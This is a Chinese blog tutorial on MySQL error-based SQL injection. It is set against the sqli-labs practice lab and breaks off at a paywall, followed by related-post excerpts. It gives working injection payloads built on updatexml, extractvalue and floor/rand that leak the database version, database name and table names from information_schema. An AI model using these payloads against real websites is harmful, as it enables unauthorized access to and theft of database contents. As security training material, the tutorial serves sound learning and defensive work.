sql注入之报错注入

已于 2024-05-12 23:03:40 修改
阅读量3.9k 收藏 53
点赞数 17
CC 4.0 BY-SA版权
文章标签: sql 数据库
于 2024-04-12 18:30:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80913334/article/details/137569872

目录

前言:

一、什么是报错注入

1、定义

2、分类

二、报错函数(掌握123重点掌握2其余了解即可)

1、extractValue()

2、updatexml()

3、floor()

4、NAME_CONST()

5、 jion()

6、exp()

7、geometryCollection()

8、polygon()

9、multipoint()

10、multlinestring()

11、multpolygon()

12、linestring()

总结:

前言:

掌握好extractvalue、updatexml、floor报错,floor报错较难需要多理解,updatexml较为常用

一、什么是报错注入

1、定义

报错注入是通过特殊函数错误使用并使其输出错误结果来获取信息的。是一种页面响应形式。

响应过程:

用户在前台页面输入检索内容\rightarrow后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行\rightarrow数据库将执行的结果返回后台,后台将数据库执行的结果无加区别的显示在前台页面

报错注入存在基础:后台对于输入输出的合理性没有做检查

演示:

输入正常语句情况下页面

输入一条报错注入的语句

?id=1' and updatexml(1,concat(0x7e,version()),3) -- a

输入报错语句情况下页面

报错显示出了数据库的版本

2、分类

通过floor()报错注入

通过extractValue()报错注入

通过updateXml()报错注入

通过NAME_CONST()报错注入

通过jion()报错注入

通过exp()报错注入

通过geometryCollection()报错注入

通过polygon()报错注入

通过multipoint()报错注入

通过multlinestring()报错注入

通过multpolygon()报错注入

通过linestring()报错注入

二、报错函数(掌握123重点掌握2其余了解即可)

1、extractValue()

语法:
EXTRACTVALUE (XML_document, XPath_string);
第一个参数:XML_document是String格式,为XML文档对象的名称
第二个参数:XPath_string (Xpath格式的字符串),Xpath语法

补充:

XPath路径表达式的基本语法如下:

/          : 从根节点开始,定位到目标节点
//         : 从当前节点开始,递归查找所有符合条件的节点
.          : 表示当前节点
..         : 表示当前节点的父节点
*          : 匹配任意节点
@          : 表示属性节点
[]         : 表示谓词,用于筛选符合条件的节点

以下是一些XPath路径表达式的示例:

/                 : 定位到根节点
/bookstore        : 定位到根节点下的bookstore节点
/bookstore/book   : 定位到bookstore节点下的所有book节点
//book            : 递归查找所有book节点
//book[@category='web'] : 查找所有category属性值为web的book节点

用法:

先创建一张表xml

CREATE TABLE xml (doc VARCHAR(150));

添加以下内容

INSERT INTO x VALUES
('
<book>
<title>A guide to the SQL standard</title>
<author>
<initial>CJ</initial>
<surname>Date</surname>
</author>
</book>
');
INSERT INTO x VALUES
('
<book>
<title>SQL:1999</title>
<author>
<initial>J</initial>
<surname>Melton</surname>
</author>
</book>
');

使用extractvalue()查询xml的作者

SELECT extractvalue(doc,'/book/author/surname') FROM xml;

使用extractvalue()查询xml的书名

SELECT extractvalue(doc,'/book/title') FROM xml;

把查询参数路径写错

SELECT extractvalue(doc,'/book/titleddd') FROM xml;    不报错但查询不到内容

把查询参数格式符号写错

SELECT extractvalue(doc,'~book/title') FROM xml;    提示报错

 利用报错查询当前数据库

SELECT extractvalue(doc,concat(0x7e,(SELECT DATABASE()))) FROM xml;
SELECT extractvalue(doc,concat('~',(SELECT DATABASE()))) FROM xml;

doc的位置是查询列可以随便填因为不是我们需要的目标
报错执行后面的sql语句SELECT DATABASE()
0x7e是~的ASCII码,concat()函数是拼接的作用。使语句变为~(SELECT DATABASE())从而报错
正常用~但是= + * .等都可以
由于concat(str1, str2,...)所以将~转化为ASCII码

实战:

sqli-labs Less-5

1、判断注入类型

2、判断闭合方式

3、查看数据库

?id=-1' and extractvalue(1,conc

最低0.47元/天 解锁文章

200万优质内容无限畅学
TGlu
关注
SQL注入---报错注入
zhoutong2323的博客
04-04 1515
SQL注入报错攻击中,攻击者通过在用户输入的位置注入恶意的SQL代码,使应用程序拼接出错误的SQL语句。当数据库执行错误的SQL语句时,会返回错误信息,这些错误信息可能包含数据库的具体错误信息、相关的数据和表结构等敏感信息。攻击者通过分析这些错误信息来获取相关的数据或者进一步攻击数据库。案例分析:上述sql注入中认为将正确的sql语句database() 改为错误的sql语句 datadase()数据库回显内容为:FUNCTION security.datadase does not exist。
SQL注入报错注入
qq_68163788的博客
01-27 3321
QL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入中注入恶意的SQL代码来执行未经授权的数据库操作。报错注入是一种SQL注入的类型,它利用数据库在执行恶意SQL语句时产生的错误消息来获取有关数据库结构和数据的信息。 假设有一个使用用户输入构建SQL查询的应用程序。攻击者可以通过在输入中注入恶意的SQL代码来触发数据库错误,并从错误消息中获取有关数据库的信息,如表名、列名等。这些信息可以帮助攻击者进一步利用数据库
SQL注入--报错注入
最新发布
rasssel的博客
07-22 659
报错注入是利用数据库错误信息中的回显内容来获取数据库信息。注入点没有直接显示查询结果,但通过构造触发SQL错误,让数据库“说出”它自己。报错盲注是最强力的非回显注入手段之一,能快速泄露数据库信息与是核心武器一旦发现无回显注入点,应优先尝试报错注入而非盲注爆破多练习,熟练掌握这些报错语句的结构、逻辑和组合方法,配合Pikachu/DVWA等靶场效果最佳。
SQL注入报错注入
2401_88752684的博客
02-07 919
当应用程序执行一个含有恶意SQL代码的查询时,如果查询出错(例如,由于语法错误或权限不足),数据库系统通常会返回一个错误信息给应用程序。实际上该语句在查询过程中会产生虚拟表,在插入虚拟表的过程中,因为插入了一个重复的值,所以就会抛出主键冗余的异常。函数的第二个参数注入不符合Xpath语法的表达式,从而引起数据库报错,并通过错误信息获取数据。函数的第二个参数注入一个无效的Xpath表达式,导致函数报错,从而获取数据。函数,实现将注入结果与报错信息回显的注入方式。在Pikachu中,进行实践。
sql注入报错注入
2302_79119987的博客
04-19 2376
实行注入的地方。
sql注入——报错注入
m0_73756016的博客
10-18 3852
报错注入是什么 什么是报错注入? 这是一种页面响应形式。响应过程如下: 用户在前台页面输入检索内容 后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行。 数据库将执行的结果返回给后台,后台将数据库执行的结果无加区别的显示到前台页面上。 报错注入存在的基础:两个“无加区别”后台对于输入输出的合理性没有做检查 分类 1. 通过floor()报错注入 2.通过extractValue()报错注入 3.通过updateXml()报错注入 4.通过NAME_CONST()
SQL注入报错注入
Forget_liu的博客
06-10 1858
第二次是假设group by后面的字段的值在虚拟表中不存在,那就需要把它插入到虚拟表中,这里在插入时会进行第二次运算,由于rand函数存在一定的随机性,所以第二次运算的结果可能与第一次运算的结果不一致,但是这个运算的结果可能在虚拟表中已经存在了,那么这时的插入必然导致主键的重复,进而引发错误。很显然rand(0)是伪随机的,有规律可循,这也是我们采用rand(0)进行报错注入的原因,rand(0)是稳定的,这样每次注入都会报错,而rand()则需要碰运气了,我们测试结果如下。//以下案例代码是抄的。
SQL 注入报错注入、延时注入、布尔盲注
2301_77160226的博客
08-27 1676
SQL 注入攻击中,报错注入、延时注入和布尔盲注是常见的攻击手段。这些攻击方式利用了数据库系统在处理用户输入时的漏洞,从而获取敏感信息或者执行恶意操作。本文将详细介绍这三种 SQL 注入攻击方式的原理和实现方法。
Sql注入-报错注入
WolvenSec的博客
06-06 2136
报错注入(Error-Based Injection)是一种通过引起数据库报错并从错误信息中提取有用信息的SQL注入攻击手法;攻击者利用数据库在处理异常情况时返回的错误消息,来推断出数据库结构、字段名甚至数据内容;这种攻击方法依赖于数据库将详细的错误消息返回给客户端。若在测试时发现网页会回显sql相关的报错信息,那么此时就可以尝试使用错误注入这种方式进行渗透。可以利用报错注入的前提:就是页面有错误信息显示出来、保证函数能够正确执行。
SQL注入-报错注入
LJH1999ZN的博客
02-09 1万+
sql注入报错注入的演示与介绍
sql 报错注入
travelnight的博客
03-15 4301
以往个人知识星球搬运 by travelnight 这里以sql-libs为例。 一、基础报错注入 这里的东西比较简单,快速略过。 访问:http://127.0.0.1/sqllabs/Less-1/ 直接构造id参数 http://127.0.0.1/sqllabs/Less-1/?id=1 直接加 ‘触发报错 直接闭合‘ 标签发现正常,说明存在报错注入。 http://127.0.0.1/sqllabs/Less-1/...
SQL注入报错注入函数
热门推荐
lightsec
03-15 1万+
前言 报错注入的前提是当语句发生错误时,错误信息被输出到前端。其漏洞原因是由于开发人员在开发程序时使用了print_r (),mysql_error(),mysqli_connect_error()函数将mysql错误信息输出到前端,因此可以通过闭合原先的语句,去执行后面的语句。 常用报错函数 updatexml() 是mysql对xml文档数据进行查询和修改的xpath函数 extractvalue() 是mysql对xml文档数据进行查询的xpa...
SQL报错注入
钟言的博客
01-30 1万+
本篇为SQL注入报错注入,详细内容包含了sqllabs第五关报错注入 updatexml报错注入原理及思路 常见的报错函数 floor报错注入原理 1、概念 2、函数回顾 2.1 rand函数 2.2 floor(rand(0)*2)函数 2.3 group by函数 2.4 count(*)函数 2.5 函数综合报错 3、报错分析 4、总结等等
sql注入实战报错注入
03-14
### SQL 注入中的报错注入实际操作方法 #### 背景介绍 报错注入(Error-Based SQL Injection)是一种通过触发数据库错误消息来提取数据的技术。这种方法通常用于无法直接从页面获取查询结果的情况下,例如 `INSERT`、`UPDATE` 或 `DELETE` 查询[^1]。 当应用程序未正确过滤输入并允许恶意字符串进入 SQL 查询时,攻击者可以通过构造特定的 SQL 语句引发异常,并利用这些异常信息推断出目标系统的内部结构和数据[^3]。 --- #### 常见工具和技术 以下是几种常用的函数和技术,在报错注入中被广泛使用: 1. **UPDATEXML()** - 函数描述:`UPDATEXML()` 是 MySQL 中的一个内置函数,可以解析 XML 数据树并更新节点值。 - 使用场景:如果传入非法路径或无效参数,它会抛出详细的错误信息,其中可能包含拼接的数据。 - 示例代码: ```sql ' AND (SELECT UPDXML(1, CONCAT(0x7e, (SELECT database())), 1)) # ``` 上述代码试图通过 `CONCAT` 将当前数据库名称附加到错误消息中[^4]。 2. **ExtractValue()** - 函数描述:类似于 `UPDATEXML()`,`ExtractValue()` 可以用来解析 XML 文档的内容。 - 错误触发机制:提供不合法的 XPath 表达式即可让其崩溃,并暴露部分数据。 - 示例代码: ```sql ' AND ExtractValue(1, CONCAT(0x7e, (SELECT user()))) # ``` 3. **FLOOR()** - 函数描述:`FLOOR()` 返回不大于给定数值的最大整数。 - 利用方式:结合随机化或其他复杂逻辑制造重复键冲突,从而导致错误输出。 - 示例代码: ```sql ' ORDER BY FLOOR(RAND(0)*2) GROUP BY id # ``` --- #### 实战案例分析 假设存在一个简单的登录验证接口 `/login?username=admin&password=pass`,并且后台执行如下查询: ```sql SELECT * FROM users WHERE username = '$username' AND password = '$password'; ``` 此时,如果我们提交以下请求: ```http /login?username=k' AND UPDATEXML(1, CONCAT(0x7e, (SELECT table_name FROM information_schema.tables LIMIT 1)), 1)-- &password=any ``` 服务器可能会返回类似这样的错误响应: > XPATH syntax error: '~tablename' 这表明我们成功地从 `information_schema.tables` 获取到了第一个表的名字。 继续深入挖掘列名或者具体记录的过程也遵循相同原理——逐步嵌套子查询直到达到目的为止。 --- #### 防护措施建议 为了防止此类攻击发生,请务必采取以下预防手段之一或多条组合策略: - 对所有外部可控变量实施严格的白名单校验; - 启用预编译语句代替动态组装SQL串; - 关闭不必要的调试模式以及隐藏敏感堆栈跟踪详情; ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值